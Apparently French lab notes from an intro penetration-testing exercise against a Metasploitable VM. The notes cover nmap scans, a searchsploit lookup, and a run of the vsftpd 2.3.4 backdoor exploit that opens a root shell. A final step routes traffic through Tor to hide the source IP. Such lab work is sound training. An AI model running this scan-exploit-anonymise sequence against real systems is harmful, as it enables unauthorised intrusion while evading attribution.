Intro à l'intrusion


Scann toutes les machines du réseau

nmap -sn 192.168.20.0/24

Scann tout les ports.

nmap -Pn 192.168.20.92 -p-

Scann tous les ports

nmap -Pn 192.168.20.92 -sV

Host discovery disabled (-Pn). All addresses will be marked 'up' and scan times will be slower.
Starting Nmap 7.91 ( https://nmap.org ) at 2021-10-19 09:32 CEST
Nmap scan report for 192.168.20.92
Host is up (0.029s latency).
Not shown: 977 closed ports
PORT     STATE SERVICE     VERSION
21/tcp   open  ftp         vsftpd 2.3.4
22/tcp   open  ssh         OpenSSH 4.7p1 Debian 8ubuntu1 (protocol 2.0)
23/tcp   open  telnet      Linux telnetd
25/tcp   open  smtp        Postfix smtpd
53/tcp   open  domain      ISC BIND 9.4.2
80/tcp   open  http        Apache httpd 2.2.8 ((Ubuntu) DAV/2)
111/tcp  open  rpcbind     2 (RPC #100000)
139/tcp  open  netbios-ssn Samba smbd 3.X - 4.X (workgroup: WORKGROUP)
445/tcp  open  netbios-ssn Samba smbd 3.X - 4.X (workgroup: WORKGROUP)
512/tcp  open  exec        netkit-rsh rexecd
513/tcp  open  login?
514/tcp  open  tcpwrapped
1099/tcp open  java-rmi    GNU Classpath grmiregistry
1524/tcp open  bindshell   Metasploitable root shell
2049/tcp open  nfs         2-4 (RPC #100003)
2121/tcp open  ftp         ProFTPD 1.3.1
3306/tcp open  mysql       MySQL 5.0.51a-3ubuntu5
5432/tcp open  postgresql  PostgreSQL DB 8.3.0 - 8.3.7
5900/tcp open  vnc         VNC (protocol 3.3)
6000/tcp open  X11         (access denied)
6667/tcp open  irc         UnrealIRCd
8009/tcp open  ajp13       Apache Jserv (Protocol v1.3)
8180/tcp open  http        Apache Tomcat/Coyote JSP engine 1.1
Service Info: Hosts:  metasploitable.localdomain, irc.Metasploitable.LAN; OSs: Unix, Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 17.14 seconds

exploit-db.com

└─$ searchsploit vsftpd                                                                                                                                                                 127 ⨯
------------------------------------------------------------------------------------------------------------------------------------------------------------ ---------------------------------
 Exploit Title                                                                                                                                              |  Path
------------------------------------------------------------------------------------------------------------------------------------------------------------ ---------------------------------
vsftpd 2.0.5 - 'CWD' (Authenticated) Remote Memory Consumption                                                                                              | linux/dos/5814.pl
vsftpd 2.0.5 - 'deny_file' Option Remote Denial of Service (1)                                                                                              | windows/dos/31818.sh
vsftpd 2.0.5 - 'deny_file' Option Remote Denial of Service (2)                                                                                              | windows/dos/31819.pl
vsftpd 2.3.2 - Denial of Service                                                                                                                            | linux/dos/16270.c
vsftpd 2.3.4 - Backdoor Command Execution                                                                                                                   | unix/remote/49757.py
vsftpd 2.3.4 - Backdoor Command Execution (Metasploit)                                                                                                      | unix/remote/17491.rb
vsftpd 3.0.3 - Remote Denial of Service                                                                                                                     | multiple/remote/49719.py
------------------------------------------------------------------------------------------------------------------------------------------------------------ ---------------------------------
Shellcodes: No Results

Telecharger et exploiter l’exploit

  Exploit: vsftpd 2.3.4 - Backdoor Command Execution
      URL: https://www.exploit-db.com/exploits/49757
     Path: /usr/share/exploitdb/exploits/unix/remote/49757.py
File Type: Python script, ASCII text executable

└─$ python3 49757.py 192.168.20.92                                                                                                                                                        1 ⨯
Success, shell opened
Send `exit` to quit shell
ip a
1: lo: <LOOPBACK,UP,LOWER_UP> mtu 16436 qdisc noqueue 
    link/loopback 00:00:00:00:00:00 brd 00:00:00:00:00:00
    inet 127.0.0.1/8 scope host lo
    inet6 ::1/128 scope host 
       valid_lft forever preferred_lft forever
2: eth0: <BROADCAST,MULTICAST,UP,LOWER_UP> mtu 1500 qdisc pfifo_fast qlen 1000
    link/ether 00:0c:29:cc:18:10 brd ff:ff:ff:ff:ff:ff
    inet 192.168.20.92/24 brd 192.168.20.255 scope global eth0
    inet6 fe80::20c:29ff:fecc:1810/64 scope link tentative 
       valid_lft forever preferred_lft forever
3: eth1: <BROADCAST,MULTICAST> mtu 1500 qdisc noop qlen 1000
    link/ether 00:0c:29:cc:18:1a brd ff:ff:ff:ff:ff:ff

Lancer un proxy tor en tache de fond et l’utiliser

└─$ tor &                                                                                                                                                                           127 ⨯ 1 ⚙
[2] 2928
                                                                                                                                                                                              
┌──(tbr㉿kali-tbr)-[~]
└─$ Oct 19 10:11:44.288 [notice] Tor 0.4.5.10 running on Linux with Libevent 2.1.12-stable, OpenSSL 1.1.1l, Zlib 1.2.11, Liblzma 5.2.5, Libzstd 1.4.8 and Glibc 2.32 as libc.             2 ⚙
Oct 19 10:11:44.288 [notice] Tor can't help you if you use it wrong! Learn how to be safe at https://www.torproject.org/download/download#warning
Oct 19 10:11:44.288 [notice] Read configuration file "/etc/tor/torrc".
Oct 19 10:11:44.289 [notice] Opening Socks listener on 127.0.0.1:9050
Oct 19 10:11:44.289 [notice] Opened Socks listener connection (ready) on 127.0.0.1:9050

┌──(tbr㉿kali-tbr)-[~]
└─$ curl http://ifconfig.me/ip --socks5 127.0.0.1:9050                                                                                                                              130 ⨯ 2 ⚙
199.249.230.109